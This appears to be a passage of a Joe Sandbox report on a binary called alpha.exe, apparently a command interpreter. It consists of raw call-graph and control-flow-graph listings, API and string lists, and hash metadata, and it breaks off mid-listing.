                                              execution_graph: interactive call-graph data (node addresses and edges) for alpha.exe; the addresses fall inside the alpha.exe image loaded at 0x7ff6eb170000 (Targets 4, 6, 8, 10 and 11). What the node labels recover is the set of APIs reached on the traced paths: exception setup (RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess), CRT start-up (_initterm, _amsg_exit, _setjmp, longjmp, Sleep), console and locale handling (GetConsoleOutputCP, GetCPInfo, GetThreadLocale, SetThreadLocale, GetConsoleTitleW, SetConsoleTitleW, SetConsoleMode), handle plumbing (_pipe, _dup, _dup2, _close, _get_osfhandle, DuplicateHandle, GetFileType, SetFilePointer), path lookup (SearchPathW, wcsrchr, wcschr, _wcsnicmp, _wcsicmp) and child-process creation (InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, GetStartupInfoW, CreateProcessW, CreateProcessAsUserW, CloseHandle), plus RegOpenKeyExW, RegQueryValueExW, RegCloseKey, VirtualQuery, VirtualFree, HeapSetInformation, GetProcessHeap, RtlFreeHeap, GetModuleHandleW, GetProcAddress, GetCurrentThreadId and OpenThread. The raw node/edge listing is truncated in the source.
calls 21319->21320 21331 7ff6eb194738 21320->21331 21328 7ff6eb177348 168 API calls 21321->21328 21323 7ff6eb1944e2 21322->21323 21329 7ff6eb177348 168 API calls 21322->21329 21330 7ff6eb1772b0 168 API calls 21323->21330 21324->21314 21324->21318 21337 7ff6eb177348 168 API calls 21324->21337 21325->21316 21326->21319 21338 7ff6eb1946c7 21326->21338 21339 7ff6eb1946ea 21326->21339 21327->21314 21333 7ff6eb1945db 21328->21333 21329->21323 21334 7ff6eb1944f1 21330->21334 21332 7ff6eb177348 168 API calls 21331->21332 21332->21297 21335 7ff6eb177348 168 API calls 21333->21335 21336 7ff6eb1772b0 168 API calls 21334->21336 21340 7ff6eb1945ec 21335->21340 21341 7ff6eb194503 21336->21341 21337->21318 21338->21319 21345 7ff6eb177348 168 API calls 21338->21345 21342 7ff6eb177348 168 API calls 21339->21342 21343 7ff6eb177348 168 API calls 21340->21343 21341->21316 21344 7ff6eb177348 168 API calls 21341->21344 21342->21319 21346 7ff6eb194600 21343->21346 21344->21297 21345->21319 21347 7ff6eb177348 168 API calls 21346->21347 21347->21297 21356 7ff6eb17735d 21348->21356 21349 7ff6eb173278 166 API calls 21350 7ff6eb194820 longjmp 21349->21350 21351 7ff6eb194838 21350->21351 21352 7ff6eb173278 166 API calls 21351->21352 21353 7ff6eb194844 longjmp 21352->21353 21354 7ff6eb19485a 21353->21354 21355 7ff6eb177348 166 API calls 21354->21355 21357 7ff6eb19487b 21355->21357 21356->21349 21356->21351 21362 7ff6eb1773ab 21356->21362 21358 7ff6eb177348 166 API calls 21357->21358 21359 7ff6eb1948ad 21358->21359 21360 7ff6eb177348 166 API calls 21359->21360 21361 7ff6eb1772ff 21360->21361 21361->21305 21361->21308 21364 7ff6eb177401 21363->21364 21364->21316 21365 7ff6eb177348 168 API calls 21364->21365 21366 7ff6eb19487b 21365->21366 21367 7ff6eb177348 168 API calls 21366->21367 21368 7ff6eb1948ad 21367->21368 21369 7ff6eb177348 168 API calls 21368->21369 21370 7ff6eb1948be 21369->21370 21370->21316
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                              • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                              • API String ID: 3305344409-4288247545
                                              • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                              • Instruction ID: b3710c31083e347f1a9af0162cfae7917129b6058f80b41ba211ac143c5603fd
                                              • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                              • Instruction Fuzzy Hash: 1942A123A0878285EA609B2198543F967A1BF8DBB8F544135DD1ECB7F4DF3EE544830A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 216 7ff6eb17aa54-7ff6eb17aa98 call 7ff6eb17cd90 219 7ff6eb18bf5a-7ff6eb18bf70 call 7ff6eb184c1c call 7ff6eb17ff70 216->219 220 7ff6eb17aa9e 216->220 221 7ff6eb17aaa5-7ff6eb17aaa8 220->221 223 7ff6eb17acde-7ff6eb17ad00 221->223 224 7ff6eb17aaae-7ff6eb17aac8 wcschr 221->224 230 7ff6eb17ad06 223->230 224->223 227 7ff6eb17aace-7ff6eb17aae9 towlower 224->227 227->223 229 7ff6eb17aaef-7ff6eb17aaf3 227->229 233 7ff6eb17aaf9-7ff6eb17aafd 229->233 234 7ff6eb18beb7-7ff6eb18bec4 call 7ff6eb19eaf0 229->234 231 7ff6eb17ad0d-7ff6eb17ad1f 230->231 237 7ff6eb17ad22-7ff6eb17ad2a call 7ff6eb1813e0 231->237 235 7ff6eb18bbcf 233->235 236 7ff6eb17ab03-7ff6eb17ab07 233->236 246 7ff6eb18bf43-7ff6eb18bf59 call 7ff6eb184c1c 234->246 247 7ff6eb18bec6-7ff6eb18bed8 call 7ff6eb173240 234->247 249 7ff6eb18bbde 235->249 239 7ff6eb17ab7d-7ff6eb17ab81 236->239 240 7ff6eb17ab09-7ff6eb17ab0d 236->240 237->221 243 7ff6eb18be63 239->243 248 7ff6eb17ab87-7ff6eb17ab95 239->248 240->243 244 7ff6eb17ab13-7ff6eb17ab17 240->244 255 7ff6eb18be72-7ff6eb18be88 call 7ff6eb173278 call 7ff6eb184c1c 243->255 244->239 250 7ff6eb17ab19-7ff6eb17ab1d 244->250 246->219 247->246 263 7ff6eb18beda-7ff6eb18bee9 call 7ff6eb173240 247->263 253 7ff6eb17ab98-7ff6eb17aba0 248->253 259 7ff6eb18bbea-7ff6eb18bbec 249->259 250->249 254 7ff6eb17ab23-7ff6eb17ab27 250->254 253->253 258 7ff6eb17aba2-7ff6eb17abb3 call 7ff6eb17cd90 253->258 254->259 261 7ff6eb17ab2d-7ff6eb17ab31 254->261 283 7ff6eb18be89-7ff6eb18be8c 255->283 258->219 269 7ff6eb17abb9-7ff6eb17abde call 7ff6eb1813e0 call 7ff6eb1833a8 258->269 265 7ff6eb18bbf8-7ff6eb18bc01 259->265 261->230 266 7ff6eb17ab37-7ff6eb17ab3b 261->266 277 7ff6eb18bef3-7ff6eb18bef9 263->277 278 7ff6eb18beeb-7ff6eb18bef1 263->278 265->231 266->265 270 7ff6eb17ab41-7ff6eb17ab45 266->270 305 7ff6eb17ac75 269->305 306 7ff6eb17abe4-7ff6eb17abe7 269->306 274 7ff6eb17ab4b-7ff6eb17ab4f 270->274 275 7ff6eb18bc06-7ff6eb18bc2a call 
7ff6eb1813e0 270->275 281 7ff6eb17ab55-7ff6eb17ab78 call 7ff6eb1813e0 274->281 282 7ff6eb17ad2f-7ff6eb17ad33 274->282 294 7ff6eb18bc5a-7ff6eb18bc61 275->294 295 7ff6eb18bc2c-7ff6eb18bc4c _wcsnicmp 275->295 277->246 284 7ff6eb18befb-7ff6eb18bf0d call 7ff6eb173240 277->284 278->246 278->277 281->221 288 7ff6eb17ad39-7ff6eb17ad3d 282->288 289 7ff6eb18bc66-7ff6eb18bc8a call 7ff6eb1813e0 282->289 291 7ff6eb18be92-7ff6eb18beaa call 7ff6eb173278 call 7ff6eb184c1c 283->291 292 7ff6eb17acbe 283->292 284->246 303 7ff6eb18bf0f-7ff6eb18bf21 call 7ff6eb173240 284->303 297 7ff6eb18bcde-7ff6eb18bd02 call 7ff6eb1813e0 288->297 298 7ff6eb17ad43-7ff6eb17ad49 288->298 324 7ff6eb18bcc4-7ff6eb18bcdc 289->324 325 7ff6eb18bc8c-7ff6eb18bcaa _wcsnicmp 289->325 337 7ff6eb18beab-7ff6eb18beb6 call 7ff6eb184c1c 291->337 301 7ff6eb17acc0-7ff6eb17acc7 292->301 309 7ff6eb18bd31-7ff6eb18bd4f _wcsnicmp 294->309 295->294 304 7ff6eb18bc4e-7ff6eb18bc55 295->304 328 7ff6eb18bd04-7ff6eb18bd24 _wcsnicmp 297->328 329 7ff6eb18bd2a 297->329 307 7ff6eb18bd5e-7ff6eb18bd65 298->307 308 7ff6eb17ad4f-7ff6eb17ad68 298->308 301->301 311 7ff6eb17acc9-7ff6eb17acda 301->311 303->246 339 7ff6eb18bf23-7ff6eb18bf35 call 7ff6eb173240 303->339 319 7ff6eb18bbb3-7ff6eb18bbb7 304->319 316 7ff6eb17ac77-7ff6eb17ac7f 305->316 306->292 321 7ff6eb17abed-7ff6eb17ac0b call 7ff6eb17cd90 * 2 306->321 307->308 320 7ff6eb18bd6b-7ff6eb18bd73 307->320 322 7ff6eb17ad6d-7ff6eb17ad70 308->322 323 7ff6eb17ad6a 308->323 317 7ff6eb18bbc2-7ff6eb18bbca 309->317 318 7ff6eb18bd55 309->318 311->223 316->292 335 7ff6eb17ac81-7ff6eb17ac85 316->335 317->221 318->307 330 7ff6eb18bbba-7ff6eb18bbbd call 7ff6eb1813e0 319->330 331 7ff6eb18bd79-7ff6eb18bd8b iswxdigit 320->331 332 7ff6eb18be4a-7ff6eb18be5e 320->332 321->337 356 7ff6eb17ac11-7ff6eb17ac14 321->356 322->237 323->322 324->309 325->324 336 7ff6eb18bcac-7ff6eb18bcbf 325->336 328->329 338 7ff6eb18bbac 328->338 329->309 330->317 331->332 342 7ff6eb18bd91-7ff6eb18bda3 iswxdigit 331->342 332->330 340 
7ff6eb17ac88-7ff6eb17ac8f 335->340 336->319 337->234 338->319 339->246 357 7ff6eb18bf37-7ff6eb18bf3e call 7ff6eb173240 339->357 340->340 348 7ff6eb17ac91-7ff6eb17ac94 340->348 342->332 345 7ff6eb18bda9-7ff6eb18bdbb iswxdigit 342->345 345->332 352 7ff6eb18bdc1-7ff6eb18bdd7 iswdigit 345->352 348->292 351 7ff6eb17ac96-7ff6eb17acaa wcsrchr 348->351 351->292 358 7ff6eb17acac-7ff6eb17acb9 call 7ff6eb181300 351->358 354 7ff6eb18bddf-7ff6eb18bdeb towlower 352->354 355 7ff6eb18bdd9-7ff6eb18bddd 352->355 361 7ff6eb18bdee-7ff6eb18be0f iswdigit 354->361 355->361 356->337 362 7ff6eb17ac1a-7ff6eb17ac33 memset 356->362 357->246 358->292 363 7ff6eb18be11-7ff6eb18be15 361->363 364 7ff6eb18be17-7ff6eb18be23 towlower 361->364 362->305 365 7ff6eb17ac35-7ff6eb17ac4b wcschr 362->365 366 7ff6eb18be26-7ff6eb18be45 call 7ff6eb1813e0 363->366 364->366 365->305 367 7ff6eb17ac4d-7ff6eb17ac54 365->367 366->332 368 7ff6eb17ac5a-7ff6eb17ac6f wcschr 367->368 369 7ff6eb17ad72-7ff6eb17ad91 wcschr 367->369 368->305 368->369 371 7ff6eb17ad97-7ff6eb17adac wcschr 369->371 372 7ff6eb17af03-7ff6eb17af07 369->372 371->372 373 7ff6eb17adb2-7ff6eb17adc7 wcschr 371->373 372->305 373->372 374 7ff6eb17adcd-7ff6eb17ade2 wcschr 373->374 374->372 375 7ff6eb17ade8-7ff6eb17adfd wcschr 374->375 375->372 376 7ff6eb17ae03-7ff6eb17ae18 wcschr 375->376 376->372 377 7ff6eb17ae1e-7ff6eb17ae21 376->377 378 7ff6eb17ae24-7ff6eb17ae27 377->378 378->372 379 7ff6eb17ae2d-7ff6eb17ae40 iswspace 378->379 380 7ff6eb17ae4b-7ff6eb17ae5e 379->380 381 7ff6eb17ae42-7ff6eb17ae49 379->381 382 7ff6eb17ae66-7ff6eb17ae6d 380->382 381->378 382->382 383 7ff6eb17ae6f-7ff6eb17ae77 382->383 383->255 384 7ff6eb17ae7d-7ff6eb17ae97 call 7ff6eb1813e0 383->384 387 7ff6eb17ae9a-7ff6eb17aea4 384->387 388 7ff6eb17aebc-7ff6eb17aef8 call 7ff6eb180a6c call 7ff6eb17ff70 * 2 387->388 389 7ff6eb17aea6-7ff6eb17aead 387->389 388->316 397 7ff6eb17aefe 388->397 389->388 390 7ff6eb17aeaf-7ff6eb17aeba 389->390 390->387 390->388 397->283
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                              • String ID: :$:$:$:ON$OFF
                                              • API String ID: 4076514806-467788257
                                              • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                              • Instruction ID: 75b9f229bde4634299c95518699a16c7a41f6f7e85fd7f5e5896d244e9524426
                                              • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                              • Instruction Fuzzy Hash: CB22B223A0865286EB249F21D9543F96691FF4EBA8F488035D90EC77F4DF7FA444834A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 398 7ff6eb1851ec-7ff6eb185248 call 7ff6eb185508 GetLocaleInfoW 401 7ff6eb18ef32-7ff6eb18ef3c 398->401 402 7ff6eb18524e-7ff6eb185272 GetLocaleInfoW 398->402 403 7ff6eb18ef3f-7ff6eb18ef49 401->403 404 7ff6eb185295-7ff6eb1852b9 GetLocaleInfoW 402->404 405 7ff6eb185274-7ff6eb18527a 402->405 408 7ff6eb18ef61-7ff6eb18ef6c 403->408 409 7ff6eb18ef4b-7ff6eb18ef52 403->409 406 7ff6eb1852bb-7ff6eb1852c3 404->406 407 7ff6eb1852de-7ff6eb185305 GetLocaleInfoW 404->407 410 7ff6eb1854f7-7ff6eb1854f9 405->410 411 7ff6eb185280-7ff6eb185286 405->411 412 7ff6eb1852c9-7ff6eb1852d7 406->412 413 7ff6eb18ef75-7ff6eb18ef78 406->413 414 7ff6eb185307-7ff6eb18531b 407->414 415 7ff6eb185321-7ff6eb185343 GetLocaleInfoW 407->415 408->413 409->408 416 7ff6eb18ef54-7ff6eb18ef5f 409->416 410->401 411->410 417 7ff6eb18528c-7ff6eb18528f 411->417 412->407 420 7ff6eb18ef99-7ff6eb18efa3 413->420 421 7ff6eb18ef7a-7ff6eb18ef7d 413->421 414->415 418 7ff6eb18efaf-7ff6eb18efb9 415->418 419 7ff6eb185349-7ff6eb18536e GetLocaleInfoW 415->419 416->403 416->408 417->404 422 7ff6eb18efbc-7ff6eb18efc6 418->422 423 7ff6eb18eff2-7ff6eb18effc 419->423 424 7ff6eb185374-7ff6eb185396 GetLocaleInfoW 419->424 420->418 421->407 425 7ff6eb18ef83-7ff6eb18ef8d 421->425 426 7ff6eb18efde-7ff6eb18efe9 422->426 427 7ff6eb18efc8-7ff6eb18efcf 422->427 428 7ff6eb18efff-7ff6eb18f009 423->428 429 7ff6eb18539c-7ff6eb1853be GetLocaleInfoW 424->429 430 7ff6eb18f035-7ff6eb18f03f 424->430 425->420 426->423 427->426 431 7ff6eb18efd1-7ff6eb18efdc 427->431 432 7ff6eb18f021-7ff6eb18f02c 428->432 433 7ff6eb18f00b-7ff6eb18f012 428->433 434 7ff6eb1853c4-7ff6eb1853e6 GetLocaleInfoW 429->434 435 7ff6eb18f078-7ff6eb18f082 429->435 436 7ff6eb18f042-7ff6eb18f04c 430->436 431->422 431->426 432->430 433->432 438 7ff6eb18f014-7ff6eb18f01f 433->438 439 7ff6eb1853ec-7ff6eb18540e GetLocaleInfoW 434->439 440 7ff6eb18f0bb-7ff6eb18f0c5 434->440 437 7ff6eb18f085-7ff6eb18f08f 435->437 441 
7ff6eb18f04e-7ff6eb18f055 436->441 442 7ff6eb18f064-7ff6eb18f06f 436->442 443 7ff6eb18f091-7ff6eb18f098 437->443 444 7ff6eb18f0a7-7ff6eb18f0b2 437->444 438->428 438->432 446 7ff6eb18f0fe-7ff6eb18f108 439->446 447 7ff6eb185414-7ff6eb185436 GetLocaleInfoW 439->447 445 7ff6eb18f0c8-7ff6eb18f0d2 440->445 441->442 448 7ff6eb18f057-7ff6eb18f062 441->448 442->435 443->444 449 7ff6eb18f09a-7ff6eb18f0a5 443->449 444->440 450 7ff6eb18f0d4-7ff6eb18f0db 445->450 451 7ff6eb18f0ea-7ff6eb18f0f5 445->451 454 7ff6eb18f10b-7ff6eb18f115 446->454 452 7ff6eb18543c-7ff6eb18545e GetLocaleInfoW 447->452 453 7ff6eb18f141-7ff6eb18f14b 447->453 448->436 448->442 449->437 449->444 450->451 456 7ff6eb18f0dd-7ff6eb18f0e8 450->456 451->446 457 7ff6eb18f184-7ff6eb18f18b 452->457 458 7ff6eb185464-7ff6eb185486 GetLocaleInfoW 452->458 455 7ff6eb18f14e-7ff6eb18f158 453->455 459 7ff6eb18f117-7ff6eb18f11e 454->459 460 7ff6eb18f12d-7ff6eb18f138 454->460 462 7ff6eb18f170-7ff6eb18f17b 455->462 463 7ff6eb18f15a-7ff6eb18f161 455->463 456->445 456->451 464 7ff6eb18f18e-7ff6eb18f198 457->464 465 7ff6eb18548c-7ff6eb1854ae GetLocaleInfoW 458->465 466 7ff6eb18f1c4-7ff6eb18f1ce 458->466 459->460 461 7ff6eb18f120-7ff6eb18f12b 459->461 460->453 461->454 461->460 462->457 463->462 468 7ff6eb18f163-7ff6eb18f16e 463->468 469 7ff6eb18f1b0-7ff6eb18f1bb 464->469 470 7ff6eb18f19a-7ff6eb18f1a1 464->470 471 7ff6eb18f207-7ff6eb18f20e 465->471 472 7ff6eb1854b4-7ff6eb1854f5 setlocale call 7ff6eb188f80 465->472 467 7ff6eb18f1d1-7ff6eb18f1db 466->467 473 7ff6eb18f1f3-7ff6eb18f1fe 467->473 474 7ff6eb18f1dd-7ff6eb18f1e4 467->474 468->455 468->462 469->466 470->469 476 7ff6eb18f1a3-7ff6eb18f1ae 470->476 475 7ff6eb18f211-7ff6eb18f21b 471->475 473->471 474->473 479 7ff6eb18f1e6-7ff6eb18f1f1 474->479 480 7ff6eb18f233-7ff6eb18f23e 475->480 481 7ff6eb18f21d-7ff6eb18f224 475->481 476->464 476->469 479->467 479->473 481->480 482 7ff6eb18f226-7ff6eb18f231 481->482 482->475 482->480
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: InfoLocale$DefaultLangUsersetlocale
                                              • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                              • API String ID: 2492766124-2236139042
                                              • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                              • Instruction ID: 9f93d3cdaa0d04ac4e673c104713fbf802711c6e3949f2bbf838eeefe345b540
                                              • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                              • Instruction Fuzzy Hash: 6DF14926B0868285EB118F11E5503F967A5FF0CBA8F944135CA4D977B4EF3EE909C70A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 483 7ff6eb184224-7ff6eb1842a5 InitializeProcThreadAttributeList 484 7ff6eb1842ab-7ff6eb1842e5 UpdateProcThreadAttribute 483->484 485 7ff6eb18ecd4-7ff6eb18ecee GetLastError call 7ff6eb199eec 483->485 486 7ff6eb18ecf0-7ff6eb18ed19 GetLastError call 7ff6eb199eec DeleteProcThreadAttributeList 484->486 487 7ff6eb1842eb-7ff6eb1843c6 memset * 2 GetStartupInfoW call 7ff6eb183a90 call 7ff6eb17b900 484->487 494 7ff6eb18ed1e 485->494 486->494 497 7ff6eb1843cc-7ff6eb1843d3 487->497 498 7ff6eb184638-7ff6eb184644 _local_unwind 487->498 499 7ff6eb184649-7ff6eb184650 497->499 500 7ff6eb1843d9-7ff6eb1843dc 497->500 498->499 499->500 503 7ff6eb184656-7ff6eb18465d 499->503 501 7ff6eb184415-7ff6eb184424 call 7ff6eb185a68 500->501 502 7ff6eb1843de-7ff6eb1843f5 wcsrchr 500->502 510 7ff6eb18442a-7ff6eb184486 CreateProcessW 501->510 511 7ff6eb184589-7ff6eb184590 501->511 502->501 504 7ff6eb1843f7-7ff6eb18440f lstrcmpW 502->504 503->501 506 7ff6eb184663 503->506 504->501 507 7ff6eb184668-7ff6eb18466d call 7ff6eb199044 504->507 506->500 507->501 513 7ff6eb18448b-7ff6eb18448f 510->513 511->510 514 7ff6eb184596-7ff6eb1845fa CreateProcessAsUserW 511->514 515 7ff6eb184495-7ff6eb1844c7 CloseHandle call 7ff6eb18498c 513->515 516 7ff6eb184672-7ff6eb184682 GetLastError 513->516 514->513 519 7ff6eb18468d-7ff6eb184694 515->519 520 7ff6eb1844cd-7ff6eb1844e5 515->520 516->519 521 7ff6eb184696-7ff6eb1846a0 519->521 522 7ff6eb1846a2-7ff6eb1846ac 519->522 523 7ff6eb1844eb-7ff6eb1844f2 520->523 524 7ff6eb1847a3-7ff6eb1847a9 520->524 521->522 525 7ff6eb1846ae-7ff6eb1846b5 call 7ff6eb1897bc 521->525 522->525 526 7ff6eb184705-7ff6eb184707 522->526 527 7ff6eb1844f8-7ff6eb184507 523->527 528 7ff6eb1845ff-7ff6eb184607 523->528 541 7ff6eb1846b7-7ff6eb184701 call 7ff6eb1cc038 525->541 542 7ff6eb184703 525->542 526->520 530 7ff6eb18470d-7ff6eb18472a call 7ff6eb17cd90 526->530 531 7ff6eb18450d-7ff6eb184512 call 7ff6eb185cb4 527->531 532 
7ff6eb184612-7ff6eb184616 527->532 528->527 533 7ff6eb18460d 528->533 543 7ff6eb18473d-7ff6eb184767 call 7ff6eb1813e0 call 7ff6eb199eec call 7ff6eb17ff70 _local_unwind 530->543 544 7ff6eb18472c-7ff6eb184738 _local_unwind 530->544 547 7ff6eb184517-7ff6eb18455e call 7ff6eb1833f0 call 7ff6eb18498c 531->547 539 7ff6eb18461c-7ff6eb184633 532->539 540 7ff6eb1847d7-7ff6eb1847df 532->540 538 7ff6eb18476c-7ff6eb184773 533->538 538->527 548 7ff6eb184779-7ff6eb184780 538->548 545 7ff6eb1847f2-7ff6eb18483c call 7ff6eb17ff70 DeleteProcThreadAttributeList call 7ff6eb188f80 539->545 540->545 546 7ff6eb1847e1-7ff6eb1847ed CloseHandle 540->546 541->526 542->526 543->538 544->543 546->545 568 7ff6eb184564-7ff6eb184579 call 7ff6eb18498c 547->568 569 7ff6eb1847ae-7ff6eb1847ca call 7ff6eb1833f0 547->569 548->527 553 7ff6eb184786-7ff6eb184789 548->553 553->527 558 7ff6eb18478f-7ff6eb184792 553->558 558->524 562 7ff6eb184794-7ff6eb18479d call 7ff6eb19a250 558->562 562->524 562->527 568->545 576 7ff6eb18457f-7ff6eb184584 call 7ff6eb19a920 568->576 569->540 576->545
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                              • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                              • API String ID: 388421343-2905461000
                                              • Opcode ID: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                              • Instruction ID: 4ad3f9c0ac13b110fd7e09abc6a3adad261ad1423e8593938282a54c16109952
                                              • Opcode Fuzzy Hash: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                              • Instruction Fuzzy Hash: 2CF13B33A18B8286EA608B11E4547FAB7A5FB8D7A8F504135D94D83774DF3EE444CB0A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 579 7ff6eb185554-7ff6eb1855b9 call 7ff6eb18a640 582 7ff6eb1855bc-7ff6eb1855e8 RegOpenKeyExW 579->582 583 7ff6eb185887-7ff6eb18588e 582->583 584 7ff6eb1855ee-7ff6eb185631 RegQueryValueExW 582->584 583->582 587 7ff6eb185894-7ff6eb1858db time srand call 7ff6eb188f80 583->587 585 7ff6eb185637-7ff6eb185675 RegQueryValueExW 584->585 586 7ff6eb18f248-7ff6eb18f24d 584->586 588 7ff6eb185677-7ff6eb18567c 585->588 589 7ff6eb18568e-7ff6eb1856cc RegQueryValueExW 585->589 591 7ff6eb18f24f-7ff6eb18f25b 586->591 592 7ff6eb18f260-7ff6eb18f265 586->592 593 7ff6eb185682-7ff6eb185687 588->593 594 7ff6eb18f28b-7ff6eb18f290 588->594 595 7ff6eb18f2b6-7ff6eb18f2bb 589->595 596 7ff6eb1856d2-7ff6eb185710 RegQueryValueExW 589->596 591->585 592->585 598 7ff6eb18f26b-7ff6eb18f286 _wtol 592->598 593->589 594->589 603 7ff6eb18f296-7ff6eb18f2b1 _wtol 594->603 599 7ff6eb18f2ce-7ff6eb18f2d3 595->599 600 7ff6eb18f2bd-7ff6eb18f2c9 595->600 601 7ff6eb185729-7ff6eb185767 RegQueryValueExW 596->601 602 7ff6eb185712-7ff6eb185717 596->602 598->585 599->596 604 7ff6eb18f2d9-7ff6eb18f2f4 _wtol 599->604 600->596 607 7ff6eb185769-7ff6eb18576e 601->607 608 7ff6eb18579f-7ff6eb1857dd RegQueryValueExW 601->608 605 7ff6eb18571d-7ff6eb185722 602->605 606 7ff6eb18f2f9-7ff6eb18f2fe 602->606 603->589 604->596 605->601 606->601 609 7ff6eb18f304-7ff6eb18f31a wcstol 606->609 610 7ff6eb18f320-7ff6eb18f325 607->610 611 7ff6eb185774-7ff6eb18578f 607->611 612 7ff6eb1857e3-7ff6eb1857e8 608->612 613 7ff6eb18f3a9 608->613 609->610 614 7ff6eb18f327-7ff6eb18f33f wcstol 610->614 615 7ff6eb18f34b 610->615 616 7ff6eb185795-7ff6eb185799 611->616 617 7ff6eb18f357-7ff6eb18f35e 611->617 618 7ff6eb18f363-7ff6eb18f368 612->618 619 7ff6eb1857ee-7ff6eb185809 612->619 620 7ff6eb18f3b5-7ff6eb18f3b8 613->620 614->615 615->617 616->608 616->617 617->608 621 7ff6eb18f38e 618->621 622 7ff6eb18f36a-7ff6eb18f382 wcstol 618->622 623 